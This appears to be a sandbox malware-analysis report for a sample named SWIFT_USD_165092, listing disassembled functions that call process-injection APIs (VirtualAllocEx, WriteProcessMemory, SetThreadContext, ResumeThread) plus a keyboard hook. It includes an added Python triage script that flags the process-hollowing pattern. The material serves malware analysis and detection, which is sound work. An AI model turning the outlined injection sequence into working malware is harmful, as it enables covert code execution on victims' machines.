                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0128558E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 6a033f03432b7708cf47a001ee226b3ba85e74d2728010d3ece3db876fd56bf4
                                                                                        • Instruction ID: 2e98274a17d53bf3a15d19ba7152313551c3c529da1bc617aa650fcd0b1db3eb
                                                                                        • Opcode Fuzzy Hash: 6a033f03432b7708cf47a001ee226b3ba85e74d2728010d3ece3db876fd56bf4
                                                                                        • Instruction Fuzzy Hash: 6E21E3B19002499FCB10CFAAD984ADEBBF4EB48320F148429E959A7250D3799645DFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 209 1285458-12854a4 211 12854b0-12854dc SetThreadContext 209->211 212 12854a6-12854ae 209->212 213 12854de-12854e4 211->213 214 12854e5-1285506 211->214 212->211 213->214
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 012854CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: a00dc8881b96aee6bc0a28947fc4e3e6b64b806928ed42d88f568a56f6d4eb58
                                                                                        • Instruction ID: 2957e955d3a2c3130759fcc295dc5b97f370143f680732c18d2a1ff40c558590
                                                                                        • Opcode Fuzzy Hash: a00dc8881b96aee6bc0a28947fc4e3e6b64b806928ed42d88f568a56f6d4eb58
                                                                                        • Instruction Fuzzy Hash: C62124B1E1061A9FCB10CF9AC9847DEFBF4FB48320F10812AD518B3240D778A9448FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 221 1285518-128559b ReadProcessMemory 223 128559d-12855a3 221->223 224 12855a4-12855c5 221->224 223->224
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0128558E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: ecfe1c1036fd2fa30e838c08f774722404e03af4bcaa6bd491d70086bf36d761
                                                                                        • Instruction ID: dc90d3fa306dc025fd6c725daef17381bb3b0c7f91e4bda5cb8548179d6153e5
                                                                                        • Opcode Fuzzy Hash: ecfe1c1036fd2fa30e838c08f774722404e03af4bcaa6bd491d70086bf36d761
                                                                                        • Instruction Fuzzy Hash: 9A2103B19002499FCB10CF9AD984BDEBBF4FF48320F108429E918A7250D378A645DFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 226 1285600-1285680 VirtualAllocEx 228 1285689-128569d 226->228 229 1285682-1285688 226->229 229->228
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01285673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 73554381fc5949410c01d40061a5c7f8538731f6930743dd246a206b61cf4fe6
                                                                                        • Instruction ID: 5118e11f8f7bf346a3e020055c08ab7bb690fc55d16c86f5ace151665492f452
                                                                                        • Opcode Fuzzy Hash: 73554381fc5949410c01d40061a5c7f8538731f6930743dd246a206b61cf4fe6
                                                                                        • Instruction Fuzzy Hash: 0A1113B5800249DFCB20CF9AD984BDEBFF4FB48324F108459E519A7650C375A955CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 231 1285608-1285680 VirtualAllocEx 233 1285689-128569d 231->233 234 1285682-1285688 231->234 234->233
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01285673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: c3e7ba9811929f39deb3c0269c315b842cf440dc37b6e534c840a47d5d9864ac
                                                                                        • Instruction ID: 47b3d6c8527d6da61a9158bf387c1df3644783a8e6cff1ad2e63d9878c53421f
                                                                                        • Opcode Fuzzy Hash: c3e7ba9811929f39deb3c0269c315b842cf440dc37b6e534c840a47d5d9864ac
                                                                                        • Instruction Fuzzy Hash: 7A11F2B5900249DFCB20DF9AD984BDEBFF4FB48324F108459E529A7250C375A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 236 12857e0-1285854 ResumeThread 238 128585d-1285871 236->238 239 1285856-128585c 236->239 239->238
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 3f0fc620adc212d7aa394d78951bff920b9cd41e4fcb657c954c2eb3946b1a1e
                                                                                        • Instruction ID: 7268577f65201ab43e44fbb8db6c7465e951e486f6d128d1e660bf7b60fa8cea
                                                                                        • Opcode Fuzzy Hash: 3f0fc620adc212d7aa394d78951bff920b9cd41e4fcb657c954c2eb3946b1a1e
                                                                                        • Instruction Fuzzy Hash: F81103B1C102498FCB20DFAAD584BDEBFF4EB48324F20845AD559B7650C375A985CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 241 12857e8-1285854 ResumeThread 243 128585d-1285871 241->243 244 1285856-128585c 241->244 244->243
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: c32b9b43d915cab4db1fdfb106bae003390c64aca2664f19a744e490e1c3daa3
                                                                                        • Instruction ID: 3ef75003030fc3a314dbe155e2f511e7bc5c45a5d57e361ab2ce2974de5603b5
                                                                                        • Opcode Fuzzy Hash: c32b9b43d915cab4db1fdfb106bae003390c64aca2664f19a744e490e1c3daa3
                                                                                        • Instruction Fuzzy Hash: C711E2B1C102498FCB20DF9AD584BDEBFF4EB48324F20846AD519B7650C775A984CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage: 16.2%
                                                                                        Dynamic/Decrypted Code Coverage: 100%
                                                                                        Signature Coverage: 0%
                                                                                        Total number of Nodes: 9
                                                                                        Total number of Limit Nodes: 0
                                                                                        execution_graph 13859 d7e2d0 13862 d7e314 SetWindowsHookExW 13859->13862 13861 d7e35a 13862->13861 13863 d725f0 13864 d7260e 13863->13864 13867 d721cc 13864->13867 13866 d72645 13869 d74110 LoadLibraryA 13867->13869 13870 d74209 13869->13870
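
The function entries above are easier to read as a set than one at a time: the 0x01280000 dump of process 0 carries small wrapper functions that each call one of VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, SetThreadContext and ResumeThread, and the execution graph adds SetWindowsHookExW and LoadLibraryA. The Python script below is an added triage example, not part of the Joe Sandbox report or its IDA plugin. It parses the "APIs" reference lines and the control_flow_graph / execution_graph strings in the format shown on this page, attaches each function's APIs to the "Source File" dump name that follows them (the layout used on this page), and checks the resulting API set against the process hollowing (RunPE) pattern that the report's "Injects a PE file into a foreign processes" signature refers to. The API sets used for the check and the dump-attribution rule are the example's own assumptions; the sample excerpt copies lines from the listings above.

```python
"""Triage helper for the Joe Sandbox IDA-plugin function listing on this page.

Added example, not part of the Joe Sandbox report. It parses "APIs" reference
lines and control_flow_graph / execution_graph strings, groups called Win32
APIs by memory dump, and checks each set for the process hollowing pattern.
The API sets below are the example's own assumptions, not the report's logic.
"""
import re
from collections import defaultdict

# "• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0128573D"
API_REF = re.compile(
    r"(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# Basic block carrying an API label in a control_flow_graph string: "236 12857e0-1285854 ResumeThread"
CFG_BLOCK = re.compile(r"\b(?P<start>[0-9a-f]{6,})-(?P<end>[0-9a-f]{6,})\s+(?P<api>[A-Z]\w+)")
# Node carrying an API label in an execution_graph string: "13862 d7e314 SetWindowsHookExW"
EXEC_NODE = re.compile(r"\b\d+\s+(?P<addr>[0-9a-f]{6,})\s+(?P<api>[A-Z]\w+)")
SOURCE_LINE = re.compile(r"Source File:\s*(?P<dump>\S+\.sdmp)")

# Assumed API sets for the check (example's own choice).
HOLLOWING_CORE = {"VirtualAllocEx", "WriteProcessMemory", "SetThreadContext", "ResumeThread"}
HOLLOWING_SUPPORT = {"ReadProcessMemory", "GetThreadContext", "NtUnmapViewOfSection",
                     "CreateProcessA", "CreateProcessW"}
KEYBOARD_HOOK = {"SetWindowsHookExA", "SetWindowsHookExW"}


def parse_report(text):
    """Return {dump: address-sorted list of (address, api, where_seen)}.

    On this page each function entry lists its APIs before its "Source File"
    line, so pending records are attached to the next dump name seen. The
    execution graph names no dump, so its nodes are filed under "execution_graph".
    """
    calls = defaultdict(list)
    pending = []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_REF.search(line)
        if m:
            pending.append((int(m["ref"], 16), m["api"], "api-ref"))
        elif line.startswith("control_flow_graph"):
            pending.extend((int(g["start"], 16), g["api"], "cfg") for g in CFG_BLOCK.finditer(line))
        elif line.startswith("execution_graph"):
            calls["execution_graph"].extend(
                (int(g["addr"], 16), g["api"], "exec-graph") for g in EXEC_NODE.finditer(line))
        else:
            m = SOURCE_LINE.search(line)
            if m:
                calls[m["dump"]].extend(pending)
                pending = []
    return {dump: sorted(set(recs)) for dump, recs in calls.items()}


def assess(calls):
    """Per dump: matched API sets, code-layout order of first occurrence, verdict."""
    out = {}
    for dump, records in calls.items():
        apis = {api for _, api, _ in records}
        first_seen = {}
        for addr, api, _ in records:          # records are address-sorted
            first_seen.setdefault(api, addr)
        core = sorted(apis & HOLLOWING_CORE)
        if len(core) == len(HOLLOWING_CORE):
            verdict = "process-hollowing pattern: all core injection APIs present"
        elif core:
            verdict = "partial injection API set: " + ", ".join(core)
        else:
            verdict = "no injection APIs"
        out[dump] = {
            "core": core,
            "support": sorted(apis & HOLLOWING_SUPPORT),
            "hooks": sorted(apis & KEYBOARD_HOOK),
            "layout_order": sorted(first_seen, key=first_seen.get),
            "verdict": verdict,
        }
    return out


# Constructed excerpt: lines copied from the function listings on this page.
SAMPLE = """\
control_flow_graph 195 12856b0-1285701 197 1285711-128574a WriteProcessMemory 195->197 198 1285703-128570f 195->198
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0128573D
• Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
control_flow_graph 202 1285450-12854a4 204 12854b0-12854dc SetThreadContext 202->204 205 12854a6-12854ae 202->205
• SetThreadContext.KERNELBASE(?,00000000), ref: 012854CF
• Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
control_flow_graph 216 1285510-128559b ReadProcessMemory 218 128559d-12855a3 216->218
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0128558E
• Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
control_flow_graph 226 1285600-1285680 VirtualAllocEx 228 1285689-128569d 226->228
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01285673
• Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
control_flow_graph 236 12857e0-1285854 ResumeThread 238 128585d-1285871 236->238 239 1285856-128585c 236->239
APIs
• Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
execution_graph 13859 d7e2d0 13862 d7e314 SetWindowsHookExW 13859->13862 13861 d7e35a 13862->13861 13869 d74110 LoadLibraryA 13867->13869
"""

if __name__ == "__main__":
    for dump, info in assess(parse_report(SAMPLE)).items():
        print(dump)
        for key, value in info.items():
            print(f"  {key}: {value}")
```

Two caveats when reading the output. The order reported is the code-layout order of the wrapper stubs in the dump, not the runtime call sequence; each entry above is a separate small function around a single API, so only the sandbox's dynamic API trace establishes that allocate, write, set context and resume actually ran in that order against a child process. ResumeThread is recovered only from the graph label, because its "APIs" list on this page is empty, which is why the graph strings are parsed in addition to the reference lines.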

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 0 6b42d08-6b42d34 1 6b42d3e-6b42d51 0->1 2 6b42d57-6b42d6b 1->2 3 6b43972-6b439c0 1->3 2->3 4 6b42d71-6b42d7f 2->4 7 6b439c2-6b439d5 3->7 8 6b439da-6b439f9 3->8 4->3 6 6b42d85-6b42d93 4->6 6->3 9 6b42d99-6b42dae 6->9 7->8 17 6b43a1d-6b43a36 8->17 18 6b439fb-6b43a0b 8->18 9->3 10 6b42db4-6b42ddc 9->10 10->3 12 6b42de2-6b42ded 10->12 13 6b42def-6b42df6 12->13 14 6b42df8-6b42dff 12->14 16 6b42e02-6b42e15 13->16 14->16 21 6b42e56-6b42e63 16->21 22 6b42e17-6b42e4f 16->22 23 6b43a41 17->23 24 6b43a38 17->24 26 6b43a10-6b43a1b 18->26 27 6b43a0d 18->27 31 6b42e65-6b42e6b 21->31 32 6b42e6d 21->32 22->21 24->23 26->17 26->18 27->26 34 6b42e74-6b42e83 31->34 32->34 35 6b42e85 34->35 36 6b42e8c-6b42e9a 34->36 35->36 36->3 37 6b42ea0-6b42ebe 36->37 37->3 38 6b42ec4-6b42ede 37->38 38->3 39 6b42ee4-6b42f07 38->39 39->3 40 6b42f0d-6b42f21 39->40 40->3 41 6b42f27-6b42f4a 40->41 41->3 42 6b42f50-6b42f5b 41->42 43 6b42f66-6b42f77 42->43 44 6b42f5d-6b42f64 42->44 43->3 46 6b42f7d-6b42f8b 43->46 44->43 45 6b42f96-6b42fac 44->45 45->3 48 6b42fb2-6b42fd4 45->48 46->3 47 6b42f91 46->47 47->45 48->3 49 6b42fda-6b42ffc 48->49 49->3 50 6b43002-6b4302d 49->50 50->3 51 6b43033-6b43047 50->51 51->3 52 6b4304d-6b4306f 51->52 52->3 53 6b43075-6b43097 52->53 53->3 54 6b4309d-6b430c8 53->54 54->3 55 6b430ce-6b430df 54->55 57 6b43104-6b43127 55->57 58 6b430e1 55->58 57->3 60 6b4312d-6b4316b 57->60 59 6b430e3-6b430ee 58->59 59->3 61 6b430f4-6b430fd 59->61 60->3 62 6b43171-6b431af 60->62 61->59 63 6b430ff 61->63 62->3 64 6b431b5-6b431eb 62->64 65 6b432b9-6b432de 63->65 64->3 66 6b431f1-6b4320d 64->66 65->3 70 6b432e4-6b432fe 65->70 66->3 67 6b43213-6b43243 66->67 67->3 69 6b43249-6b43279 67->69 69->3 71 6b4327f-6b432af 69->71 70->3 72 6b43304-6b4333d 70->72 71->3 73 6b432b5 71->73 77 6b4333f-6b43357 72->77 78 6b43359-6b43367 72->78 73->65 79 6b4336d-6b43382 77->79 78->79 79->3 80 6b43388-6b433a2 
79->80 80->3 81 6b433a8-6b433bc 80->81 82 6b433be-6b433d6 81->82 83 6b433d8-6b433e6 81->83 84 6b433ec-6b43410 82->84 83->84 86 6b43412-6b43435 84->86 87 6b4344e-6b4345c 84->87 101 6b43437 86->101 102 6b4343d-6b4343f 86->102 88 6b43462-6b43475 87->88 89 6b43571-6b43586 88->89 90 6b4347b-6b4348e 88->90 89->3 94 6b4358c-6b435a0 89->94 92 6b43490-6b434a6 90->92 93 6b434a8-6b434bd 90->93 92->93 95 6b434f3-6b43515 92->95 93->3 96 6b434c3-6b434d7 93->96 94->3 98 6b435a6-6b435b1 94->98 95->3 100 6b4351b-6b43553 95->100 96->3 99 6b434dd-6b434ee 96->99 103 6b435b7-6b435d9 98->103 99->103 100->3 104 6b43559-6b4356f 100->104 105 6b43441 101->105 106 6b43439-6b4343b 101->106 107 6b43446-6b4344c 102->107 108 6b43603-6b43627 103->108 109 6b435db-6b43601 103->109 104->103 105->107 106->102 106->105 107->88 110 6b43631-6b43640 108->110 109->110 110->3 111 6b43646-6b4365b 110->111 111->3 112 6b43661-6b43682 111->112 112->3 113 6b43688-6b436b0 112->113 113->3 114 6b436b6-6b436de 113->114 114->3 115 6b436e4-6b43715 114->115 115->3 116 6b4371b-6b4372c 115->116 117 6b43740-6b43755 116->117 118 6b4372e-6b43732 116->118 117->3 120 6b4375b-6b4376f 117->120 118->117 119 6b43734 118->119 121 6b437b9-6b437dc 119->121 122 6b4373a-6b4373e 119->122 120->3 123 6b43775-6b43789 120->123 121->3 125 6b437e2-6b43820 121->125 122->117 122->121 123->3 124 6b4378f-6b437a3 123->124 124->3 127 6b437a9-6b437b4 124->127 125->3 126 6b43826-6b43864 125->126 126->3 128 6b4386a-6b438a8 126->128 129 6b438be-6b438d7 127->129 128->3 130 6b438ae-6b438b8 128->130 132 6b438d9-6b438f7 129->132 133 6b438fa-6b438fe 129->133 130->129 132->133 134 6b43930-6b43939 133->134 135 6b43900-6b43908 133->135 134->3 136 6b4393b-6b43952 134->136 138 6b43912-6b4392d 135->138 139 6b4390a-6b4390f 135->139 136->3 140 6b43954-6b43971 136->140 138->134 139->138
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -$.
                                                                                        • API String ID: 0-3807043784
                                                                                        • Opcode ID: 523a68b263c1472c29bd8895df26ddd42d6866cc4bb8ebaa578863363bfbf301
                                                                                        • Instruction ID: 592d0c47234eb6a4ae543b4d697731afcf2976ca197b1c38e6d4848d2fe25afa
                                                                                        • Opcode Fuzzy Hash: 523a68b263c1472c29bd8895df26ddd42d6866cc4bb8ebaa578863363bfbf301
                                                                                        • Instruction Fuzzy Hash: 6F827E70914269CBDB65CF29CC817E8BBF2BB45300F5881E5D88AAB356D7349E81DF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        • Opcode ID: acc664bbab047e1e351071110b2e5df977c94e280c5c39ada8cef279584eafa9
                                                                                        • Instruction ID: cee0f475afb1859d345250672e1e30558787c847b2e7d6cfa4b129d17e2df4de
                                                                                        • Opcode Fuzzy Hash: acc664bbab047e1e351071110b2e5df977c94e280c5c39ada8cef279584eafa9
                                                                                        • Instruction Fuzzy Hash: F0729370A10255CFDB25DF29C884BADB7F2FF45310F5881A9E88A9B396D7309D81DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f3e1398848c52ecee81576b69e9729f778e298e723d59fc3ecbf9a3df55db2f
                                                                                        • Instruction ID: 81c1fe24611f46f0303da1c26b550cd26659440d9e464e416e8c59f5e971bd42
                                                                                        • Opcode Fuzzy Hash: 7f3e1398848c52ecee81576b69e9729f778e298e723d59fc3ecbf9a3df55db2f
                                                                                        • Instruction Fuzzy Hash: D6A29CB1A00224CFDB64CB18C984BA8BBF2EF45304F1981E9E5899B356C775EE85DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 2390 d7ade8-d7ae03 2391 d7b035-d7b046 2390->2391 2392 d7ae09-d7ae10 2390->2392 2401 d7b04f-d7b05e 2391->2401 2393 d7ae12-d7ae1b 2392->2393 2394 d7ae1c-d7ae3b 2392->2394 2396 d7ae41-d7ae62 2394->2396 2397 d7b028-d7b034 2394->2397 2398 d7ae64-d7ae68 2396->2398 2399 d7ae6a-d7ae98 2396->2399 2398->2399 2400 d7ae9a 2398->2400 2403 d7ae9d-d7af23 call d7a020 2399->2403 2400->2403 2407 d7b064-d7b075 2401->2407 2462 d7af25 call d7ade5 2403->2462 2463 d7af25 call d7b1c2 2403->2463 2464 d7af25 call d7b080 2403->2464 2465 d7af25 call d7ade8 2403->2465 2407->2401 2410 d7b077-d7b17c 2407->2410 2426 d7b185-d7b1d0 2410->2426 2427 d7b17e-d7b184 2410->2427 2419 d7af2b-d7af39 call d7a530 2424 d7af3b-d7af3d 2419->2424 2425 d7af98-d7af9c 2419->2425 2430 d7af81-d7af90 2424->2430 2428 d7afdf-d7afe6 2425->2428 2429 d7af9e-d7afab 2425->2429 2452 d7b1d2 2426->2452 2453 d7b1da-d7b1de 2426->2453 2427->2426 2434 d7affa-d7affe 2428->2434 2435 d7afe8-d7afef 2428->2435 2432 d7afbf-d7afd1 2429->2432 2433 d7afad-d7afb2 2429->2433 2430->2425 2431 d7af92 2430->2431 2437 d7af94-d7af96 2431->2437 2438 d7af3f-d7af4b 2431->2438 2439 d7b020-d7b025 2432->2439 2449 d7afd3-d7afdd 2432->2449 2433->2432 2442 d7afb4-d7afbd 2433->2442 2434->2439 2440 d7b000-d7b007 2434->2440 2435->2434 2436 d7aff1 2435->2436 2436->2434 2437->2425 2437->2438 2438->2407 2445 d7af51-d7af80 2438->2445 2439->2397 2440->2439 2444 d7b009-d7b01f 2440->2444 2442->2439 2445->2430 2449->2439 2452->2453 2456 d7b1e0-d7b1ec 2453->2456 2457 d7b1fa 2453->2457 2458 d7b1f4 2456->2458 2459 d7b1ee-d7b1f1 2456->2459 2460 d7b1fb 2457->2460 2458->2457 2459->2458 2460->2460 2462->2419 2463->2419 2464->2419 2465->2419
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6b6216e5581cfbef887b9ac430757c038773c05a353bf69d3781af14fcf14ae
                                                                                        • Instruction ID: 423385f451c2a99611a61b4181a16cfcfe857194a62b07d2e74f294d58d932aa
                                                                                        • Opcode Fuzzy Hash: f6b6216e5581cfbef887b9ac430757c038773c05a353bf69d3781af14fcf14ae
                                                                                        • Instruction Fuzzy Hash: 60D13D75E00209DFCB14DFA8D494AAEFBF1FF88310F14855AE419AB351DB34A946CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 51bb3274f72c03a3543b01d62b44e92151df4148948a1137bb5b304744dd8b97
                                                                                        • Instruction ID: 9e74c9617234c1b22ce492d1a1b0aae33c3817ab098169af5ab0a84a443d0b74
                                                                                        • Opcode Fuzzy Hash: 51bb3274f72c03a3543b01d62b44e92151df4148948a1137bb5b304744dd8b97
                                                                                        • Instruction Fuzzy Hash: DEB12D70E04209CFDF14CFA9C98579EBBF2BF88704F18C529E819A7254EB749845CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0634657a1d746223fb2ec0ff0af9c7904bbf868b4dec6bb2053dfbe6a0e57675
                                                                                        • Instruction ID: f1a0306523d00a6a59bfdc9d5320c5f5f6ba42dbf906c0e0d7903884a0ff2762
                                                                                        • Opcode Fuzzy Hash: 0634657a1d746223fb2ec0ff0af9c7904bbf868b4dec6bb2053dfbe6a0e57675
                                                                                        • Instruction Fuzzy Hash: 0BB13E70E04209CFDB10CFA9C9857ADBBF2AF88714F18C929E419E7254EB749985CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 406 d74104-d74167 407 d741bb-d74207 LoadLibraryA 406->407 408 d74169-d7418e 406->408 412 d74210-d74241 407->412 413 d74209-d7420f 407->413 408->407 411 d74190-d74192 408->411 415 d741b5-d741b8 411->415 416 d74194-d7419e 411->416 418 d74243-d74247 412->418 419 d74251 412->419 413->412 415->407 420 d741a2-d741b1 416->420 421 d741a0 416->421 418->419 422 d74249 418->422 424 d74252 419->424 420->420 423 d741b3 420->423 421->420 422->419 423->415 424->424
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: dd3c03e29aa0a5020c626bbf3236ef305552d2341585c6f5e92c816e31e46ea8
                                                                                        • Instruction ID: 7bf13d239e847cff7714ce9b666fad60cac4148efc59a7eccd2a3d88327b12d3
                                                                                        • Opcode Fuzzy Hash: dd3c03e29aa0a5020c626bbf3236ef305552d2341585c6f5e92c816e31e46ea8
                                                                                        • Instruction Fuzzy Hash: D2414AB1D103489FDB11DFA9C88579EBBF1EF48314F148129E819AB381E7749885CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 425 d721cc-d74167 427 d741bb-d74207 LoadLibraryA 425->427 428 d74169-d7418e 425->428 432 d74210-d74241 427->432 433 d74209-d7420f 427->433 428->427 431 d74190-d74192 428->431 435 d741b5-d741b8 431->435 436 d74194-d7419e 431->436 438 d74243-d74247 432->438 439 d74251 432->439 433->432 435->427 440 d741a2-d741b1 436->440 441 d741a0 436->441 438->439 442 d74249 438->442 444 d74252 439->444 440->440 443 d741b3 440->443 441->440 442->439 443->435 444->444
                                                                                        APIs
                                                                                        Memory Dump Source
